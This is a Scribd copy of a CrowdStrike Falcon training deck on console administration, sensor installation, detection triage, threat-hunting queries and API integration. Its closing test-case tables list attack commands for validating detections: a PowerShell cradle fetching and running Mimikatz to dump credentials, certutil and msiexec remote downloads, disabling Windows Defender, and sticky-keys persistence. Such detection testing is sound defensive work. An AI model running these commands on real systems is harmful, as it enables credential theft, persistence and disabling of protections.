Scribd
Upload
4K views103 pages

CrowdStrike Training PDF

This document outlines an agenda for a CrowdStrike training covering various security roles. The agenda includes an overview section and sections on the administrator, responder, hunter, and integrator roles. It emphasizes how CrowdStrike's technology can help stop breaches through next-generation antivirus, automated hunting, and indicators of attack to detect threats across endpoints, clouds, and identities. Traditional defenses are overwhelmed by modern attacks, necessitating CrowdStrike's prevention, detection, and response capabilities.

Uploaded by

Sarayuth Sae-tung
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4K views103 pages

CrowdStrike Training PDF

This document outlines an agenda for a CrowdStrike training covering various security roles. The agenda includes an overview section and sections on the administrator, responder, hunter, and integrator roles. It emphasizes how CrowdStrike's technology can help stop breaches through next-generation antivirus, automated hunting, and indicators of attack to detect threats across endpoints, clouds, and identities. Traditional defenses are overwhelmed by modern attacks, necessitating CrowdStrike's prevention, detection, and response capabilities.

Uploaded by

Sarayuth Sae-tung
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 103

CROWDSTRIKE

TRAINING

Pattadon M.
▪ Overview
▪ Administrator
AGENDA ▪ Responder
▪ Hunter
▪ Integrator

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


OVERVIEW

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


WE STOP BREACHES

2022 CrowdStrike, Inc. All rights reserved.


OVERWHELMING SIGNATURE OVERBURDEN WORKLOADS

CROWDSTRIKE
Overview

OUTMODED DEFENSES

MALWARE YOU NEED COMPLETE MALWARE-FREE


BREACH

32% PREVENTION
68% HIGH

HARDER TO PREVENT
MALWARE

& DETECT
LOW
THREAT
SOPHISTICATION
LOW
NON-MALWARE
ATTACKS
HIGH
TERRORISTS HACKTIVISTS/ CYBER- ORGANIZED NATION-
VIGILANTES CRIMINALS CRIMINAL GANGS STATES
2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.
Overview

SOPHISTICATED ATTACKS REQUIRE MORE OF EXPERTISE THAN TECHNOLOGY

Proactive
Threat Hunting
PROTECTION
SIEM Correlation
TECHNIQUES Behavioral Analysis
Threat Hunting
Exploit Blocking
Signatures Reputation Sandbox Host IPS
IOCs/Blacklisting Machine Learning
Machine Learning Whitelisting

DIFFICUL TY

ATTA CK
SOPHISTICA TION
FILE BASED MALWARE FILELESS AND EXPLOITS LIVE ATTACKER/INSIDER
Malware Zero-Day Exploitation of Zero-Day Credential Living off Hands-on
Malware vulnerabilities Malware Theft the land keyboard

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


DATA LEAKAGE

CROWDSTRIKE
Overview

SURVIVAL OF THE FASTEST

TO STAY AHEAD YOU DETECT IN INVESTIGATE IN RESPOND IN


11
MUST:
BR E A K O UT TIME 1min 10min 60min
10
9
8
1 2 3 4 5 6 7

Initial Access Execution Persistence Privilege Defense Credential Discovery Lateral Collection Exfiltration Command & Impact
Escalation Evasion Access Movement Control

MITR E A T T &C K PHA SE

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


ONE AGENT
FULL VISIBILITY
Falcon Agent
Prevent • Predict • Detect • Respond

Clouds Identities
Endpoints
Active Directory
Data Centers
Workstations Mobile
User Accounts

Servers IOT Workloads Containers 3rd Parties


2022 CrowdStrike, Inc. All rights reserved.
Overview

NEXT-GEN AV CROWDSTRIKE FAL CON


CERTIFIED AS LEG ACY
F AL C ON P R E VE N T AV REPL ACEMENT

BUSINESS VALUE
Improves protection
Machine Block
Learning Known Bad
Reduces number of
incidents

Improves user productivity –


no user impact

Reduces complexity

IOA Delivers security efficiency


Behavioral Exploit and efficacy
Blocking Blocking

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

AUTOMATED HUNTING ENGINE


THREAT GRAPH

135 MILLION
IOA DECISIONS/MIN

5 TRILLION+
EVENTS/WEEK

150+
ADVERSARIES
TRACKED

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

INDICATORS OF ATTACK (IOA)

PROCESS INDICATORS OF ATTACK


EXECUTES Code Execution, persistence,
stealth, command control
Lateral Movement
PROCESS DELETES
BACKUPS
PROACTIVE INDICATORS OF ATTACK
VS
PROCESS CALLS REACTIVE INDICATORS OF COMPROMISE
ENCRYPTION
ROUTINE
PROCESS
ENUMERATES IOCs
FILE SYSTEM Malware, Signatures, Exploits,
Vulnerabilities, IP Addresses

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

ENDPOINT DETECTION AND RESPONSE


FALCON INSIGHT

BUSINESS VALUE
Reduce time-to-respond
Real-time and Record
Historical Everything
Search Improve SOC
productivity

Reduced time
to remediation
Augment skills and
expertise
Real-time Reduce risk
Response and Threat
Containment Hunting
Gain security efficiency
and efficacy

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

POWERFUL RESPONSE AND REMEDIATION

COLLECT INFO

Network
Processes File System Registry Activities Memory OS Events

Kill Delete File Modify Network Custom


Process Blacklist File Registry Quarantine Scripts

TAKE ACTION

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

3 SMALL STEPS TO REPLACE YOUR AV

1 2 3

No infrastructure No fine-tuning, Install the Verify the No reboot No signatures No scan Remove legacy
setup rule writing Falcon Agent installation updates products

Financial Institution Hospitality Chain Technology Company Financial Institution

77,000 AGENTS 40,000 AGENT 55,000 AGENTS 5 300,000 AGENTS


1 DAY 5 DAYS DAYS 90 DAYS

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Overview

https://falcon.us-2.crowdstrike.com/

ts01-gyr-maverick.cloudsink.net: 443
lfodown01-gyr-maverick.cloudsink.net: 443

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Falcon Platform

Dashboards

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Falcon Platform

Host Mgmt.

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


NGAV

Machine learning

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


NGAV

Malicious behavior

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Investigation

Incidents

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Investigation

Host search

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Investigation

Event search

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder
NGAV

Real Time Response

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunting

Threat hunting

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Workflow

Workflows
Automating actions

- Notifications

- Get/remove files
- Retrieve connection
- Retrieve processes

- Contain hosts
- Context enrichment

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


ADMINISTRATOR

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator

▪ Set up users
▪ Configure alerts

▪ Create host groups


ADMINISTRATOR ▪ Create prevention policies
▪ Create sensor update policies
▪ Exclusions

▪ Install sensors

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Set up users

Set up users

Falcon Users >


User Management

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Set up users

Set up users

https://falcon.us-
2.crowdstrike.com/document
ation/74/users-and-roles

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Configure alerts

Configure alerts – Detection email alerts

Configuration >
General Settings

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Configure alerts

Configure alerts – Workflow alerts

Configuration >
Workflows

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Configure alerts

Configure alerts – Workflow alerts

Configuration >
Workflows

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator

New host Default policy

Creating a host group Creating a policy


Assigning hosts to a host group Assigning a policy to a host group

Host group
Prevention Policy
Host
Sensor Update Policy

Response Policy

Firewall Policy

USB Device Policy

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Create host groups

Create host groups - Dynamic

Host setup and management >


Host groups

Dynamic – defined by attribute, like OS version, OU or prefix/suffix


When hosts match rule, automatically added to group

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Create host groups

Create host groups - Static

Host setup and management >


Host groups

Static – defined manually


Uploading a list of hostnames or selecting hosts

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Prevention Policy

Prevention Policy – Detect only

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.

Endpoint security > Prevention policies


Administrator
Prevention Policy

Prevention Policy – Fully protection

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.

Endpoint security > Prevention policies


Administrator
Sensor Update Policy

Sensor Update Policy

- Control sensor version updates

- Protect from unauthorized uninstall

Recommend
Create one policy used for uninstallation

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Response Policy

Response Policy

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
USB Device Policy

USB Device Policy

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator

Assign policy to host group

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Exclusions

Exclusions

Configuration > Exclusions

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Exclusions

Create exclusion

Choose hosts to target

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Exclusions

Create exclusion
Use **\HiveNightmare.exe
for exclude HiveNightmare.exe

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors
https://falcon.us-2.crowdstrike.com/

ts01-gyr-maverick.cloudsink.net: 443
lfodown01-gyr-maverick.cloudsink.net: 443

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors
System requirements

64-bit Server Linux macOS


• Windows Server 2022 • Amazon Linux • Monterey 12
• Windows Server 2019 • CentOS • Big Sur 11
• Windows Server 2016 • Debian • Catalina 10.15
• Windows Server 2012 • Oracle • Mojave (End 25 Oct 2021)
• Windows Server 2008 R2 SP1 • RHEL
• SLES
Desktop • Ubuntu
• Windows 11
• Windows 10
• Windows 8.1
• Windows 7 SP1

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors
Network Configuration
Need to open outbound communication over port 443

Cloud Login Public DNS Names


ts01-b.cloudsink.net
US-1: falcon.crowdstrike.com
lfodown01-b.cloudsink.net

ts01-gyr-maverick.cloudsink.net
US-2: falcon.us-2.crowdstrike.com
lfodown01-gyr-maverick.cloudsink.net

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors

If you have SSL encryption, SSL decrypt, or any deep packet inspection…
You need to set up a bypass for all that traffic.

CrowdStrike does certificate pinning against threats like man-in-the-middle.

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


INSTALLATION -
WINDOWS

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Windows

Always start with pre-production


• Do some test installations.
• Make sure all critical applications are still running as necessary.

Manual installation Automatic installation

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Windows

Sensor Downloads

1. Download sensor installer from


Hosts > Sensor Downloads
• Use Chrome browser
2. Copy Customer ID (CID)

123456789012-A0

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Installation
Install sensors – Windows

3.1 Manual installation

After installation, sensor will run silently


Validate that sensor us running, run sc query csagent

123456789012-A0

3.2 Automatic installation


Run or configure deployment tool
WindowsSensor.exe /install /quiet /norestart CID=<CCID>

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Installation
Install sensors – Windows

Proxy Configuration

APP_PROXYNAME=<Proxy FQDN or IP>


APP_PROXYPORT=<Proxy Port>

PACURL=<Pac file URL>

Preparing master images for cloning

NO_START=1 Sensor will not start until host boots


VDI
VDI=1 AID will be assigned based on hosts FQDN

Uninstall

CSUninstallTool.exe

Directory: C:\windows\system32drivers\crowdstrike
Registry Key: HKLM\System\CrowdStrike

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Windows

Host Management

Check installation logs


%LOCALAPPDATA%\temp\

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


INSTALLATION -
MAC
CATALINA

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Catalina

Sensor Downloads

1. Download sensor installer from


Hosts > Sensor Downloads
• Use Chrome browser
2. Copy Customer ID (CID)

123456789012-A0

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Catalina

Run the sensor installer 3. Double-click the .pkg file

Kernel Extension Blocked


“Open Security Preferences” > Allow

4. Provide CID
sudo
/Applications/Falcon.app/Contents/Resources/fal
conctl license 123456-A0

123456789012-A0
123456789012-A0

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Catalina

Run the sensor installer

5. Grant Full Disk Access


System Preferences… > Security & Privacy

Full Disk Access > Falcon

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Catalina

Run the sensor installer

6. Verifying sensor installation


sudo
/Applications/Falcon.app/Contents/Resources/fal
conctl stats

Verifying sensor components


[kernel extension]
kextstat | grep crowd

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Catalina

Host Management

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


INSTALLATION -
MAC
BIG SUR

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Big Sur

Sensor Downloads

1. Download sensor installer from


Hosts > Sensor Downloads
• Use Chrome browser
2. Copy Customer ID (CID)

123456789012-A0

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Big Sur
3. Double-click the .pkg file

4. Provide CID
sudo /Applications/Falcon.app/Contents/Resources/falconctl license 123456-A0

Filter Network Content


“Allow” 123456789012-A0
123456789012-A0
System Extension Blocked
“Open Security Preferences” > Allow

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Big Sur

5. Grant Full Disk Access


System Preferences… > Security & Privacy
Full Disk Access > Falcon, Agent

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Big Sur

6. Verifying sensor installation


sudo /Applications/Falcon.app/Contents/Resources/falconctl stats

Verifying sensor components


[system extension]
systemextensionsctl list | grep crowd

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Big Sur
Unload and uninstall
sudo /Applications/Falcon.app/Contents/Resources/falconctl unload
sudo /Applications/Falcon.app/Contents/Resources/falconctl uninstall

Delete host
Hosts > Host Management
Select host and delete

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


INSTALLATION -
LINUX

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Linux

Sensor Downloads

1. Download sensor installer from


Hosts > Sensor Downloads
• Use Chrome browser
2. Copy Customer ID (CID)

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Administrator
Install sensors – Linux

Run the sensor installer 3. Run the installer

Ubuntu
sudo dpkg -i <installer>
RHEL, CentOS, Amazon Linux
sudo yum install <installer>
SLES
sudo zypper install <installer>

4. Set CID on the sensor


sudo /opt/CrowdStrike/falconctl -s --cid=<CID>

5. Start the sensor manually

Ubuntu
6. Confirm that sensor is running service falcon-sensor start
RHEL, CentOS
ps -e | grep falcon-sensor systemctl start falcon-sensor

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Installation
Install sensors – Linux

Proxy Configuration

sudo /opt/CrowdStrike/falconctl -s --aph=<Proxy IP> --app=<Proxy Port>


sudo /opt/CrowdStrike/falconctl -g --aph --app
sudo /opt/CrowdStrike/falconctl -s --apd=FALSE

Uninstall
Ubuntu
sudo apt-get purge falcon-sensor
RHEL, CentOS, Amazon Linux
sudo yum remove falcon-sensor
SLES
sudo zipper remove falcon-sensor

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


MONITOR AND
TRIAGE
DETECTIONS

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections

Activity > Detections

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
File-based

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
File-based

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
File-based

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
File-based

Quarantine

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
Fileless

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
Fileless

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Detections
Fileless

IOA Exclusion

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

RTR

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

RTR

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

Containment
Contain an infected host

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


HUNTER

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

Incidents

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

Host Search

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

User Search

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

Hunt

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

Event Search

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Hunter

Event Search
Show me any instances of common reconnaissance tools
event_simpleName=ProcessRollup2 (FileName=net.exe OR FileName=ipconfig.exe
OR FileName=whoami.exe OR FileName=quser.exe OR FileName=ping.exe OR
FileName=netstat.exe OR FileName=tasklist.exe OR FileName=Hostname.exe OR
FileName=at.exe) | table ComputerName UserName FileName CommandLine
Show me processes that only ran a few of times
event_simpleName=ProcessRollup2 OR event_simpleName=SyntheticProcessRollup2
| stats count by SHA256HashData ImageFileName ComputerName UserName |
where count <5 | sort – count

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


INTEGRATOR

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Integrator

REST-based API, OAuth2.0

Support >
API Clients and Keys

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Integrator

CrowdStrike Store – extend the functionality

CrowdStrike Store >


Partner Apps

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Integrator

CrowdStrike Store – extend the functionality

CrowdStrike Store >


Plugins

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Dashboard

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

TESTCASES

Technique Test

Credential Dumping Dumping Credentials from Task manager


Create a dump of lsass.exe from Task Manager

Dumping credentials with mimikatz injected in memory


powershell.exe "iex (New-
ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/ma
ttifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-
Mimikatz -DumpCreds"
Remote file copy certutil.exe -urlcache -split -f
https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/do
wnload/cactus.js C:\Users\Public\en-US.js
Masquerading Copy C:\Windows\System32\calc.exe as svchost.exe and run it

Intel-based detection ping webonline.mefound.com, systemlowcheck.com

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Responder

TESTCASES

Technique Test

Defense Evasion Defense Evasion via Process Hollowing Keep Access


msiexec /q /I https://google.com/malware.exe

Defense Evasion via Disable or Modify Tools


reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Persistence Persistence via Accessibility Features
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Privilege Escalation Privilege Escalation via Token Theft
powershell "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifest
ation/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1'); Invoke-
TokenManipulation -Enumerate"

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Machine learning

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Custom IOA

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Real Time Response

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Real Time Response

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.


Machine learning

2020 CROWDSTRIKE, INC. AL L RIGHTS RESERVED.

You might also like